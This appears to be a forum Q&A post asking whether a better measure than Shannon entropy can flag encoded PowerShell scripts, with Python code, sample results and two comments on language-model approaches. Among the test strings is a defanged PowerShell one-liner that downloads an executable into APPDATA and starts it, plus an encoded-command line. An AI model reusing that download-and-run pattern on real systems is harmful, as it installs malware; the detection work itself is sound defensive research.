# Is there a better method for entropy calculation than shannon entropy for measuring entropy of a PowerShell script?

Tags: python, data-science, entropy

I thought it would be pretty easy to write a function which measures entropy in a string (or more likely copy / paste a method someone else made) in order to detect encoded PowerShell scripts. Googled around, found shannon entropy, but the result is not helpful:

```
from collections import Counter
from math import log

def shannon(string):
    counts = Counter(string)
    frequencies = ((i / len(string)) for i in counts.values())
    print(- sum(f * log(f, 2) for f in frequencies), string)

shannon("lsass.exe lsass.exe lsass.exe lsass.exe")
shannon("33fsd.exe 33fsd.exe 33fsd.exe 33fsd.exe")
shannon("This is an encoded string encoded string")
shannon("hxxxttps://www.google.com https://www.google.com")
shannon("hxxxttps://3lkl3h4kljnl.fruityflies.com")
shannon("VGhpcyBpcyBhbiBlbmNvZGVkIHN0cmluZw==")
shannon('''powershell.exe (New-Object System.Net.WebClient).DownloadFile('htxxtp://broke.ip.for.safety/~yahoo/csrsv.exe',"$env:APPDATA\csrsv.exe");Start-Process ("$env:APPDATA\csrsv.exe")''')
shannon('''powershell.exe –EncodedCo-broke-syntax-for-safety-mmand ZQBjAGgAbwAgACIARABvAHIAbwB0AGgAeAZQBjAGgAbwARABvAHIAbwB0AGgAeQAiAAZQBjAGgAbwAgACIARABvAHIAbwB0AGgAeQAiAAZQBjAGgAbgergegerge==''')
```

Note that I sort of went in and broke all the IPs and URLs in this post manually to be safe and break those scripts (not that we're actually executing any PowerShell), so ignore the inconsistencies.

The results:

```
2.624519205764368 lsass.exe lsass.exe lsass.exe lsass.exe
2.9070717700888262 33fsd.exe 33fsd.exe 33fsd.exe 33fsd.exe
3.593942707918268 This is an encoded string encoded string
3.7358630961373667 htxxxtps://www.google.com https://www.google.com
4.270910335425637 htxxxtps://3lkl3h4kljnl.fruityflies.com
4.294653473544341 VGhpcyBpcyBhbiBlbmNvZGVkIHN0cmluZw==
5.214435811329176 powershell.exe (New-Object System.Net.WebClient).DownloadFile('htxxxtp://broke.ip.for.safety/~yahoo/csrsv.exe',"$env:APPDATA\csrsv.exe");Start-Process ("$env:APPDATA\csrsv.exe")
4.270483739208834 powershell.exe –EncodedCo-broke-syntax-for-safety-mmand ZQBjAGgAbwAgACIARABvAHIAbwB0AGgAeQAiAAZQBjAGgAbwAgACIARABvAHIAbwB0AGgAeQAiAAZQBjAGgAbwAgACIARABvAHIAbwB0AGgAeQAiAAZQBjAGgAbgergegerge==
```

As you can see, when it came to longer examples, the obviously encoded command measures at a lower entropy level.

Is there a different entropy measurement approach which might fare better?

Comment: I am trying to achieve something similar. After taking some time looking to different entropy measurements, I am planning to use some kind of language model. Consider you replace uppercase letters with U, lowercase with l, digits by 0, and remaining by !. You get a four character language, with 64 combinations for a trigram model. If I find something useful I can share it here.

Comment: @Alberto I'm working on a similar approach to a language model. I separate the string by syntax (just a list of chars I chose arbitrarily) and perform comprehensive analysis on all the features I can think of to describe the resulting "symbols" and their relationship to other adjacent symbols. I don't replace with characters, but effectively every unique string is a unique "symbol" in my analysis. But ultimately rather than measuring entropy, I measure a baseline of similarity. Which is very similar if not identical to the concept of entropy.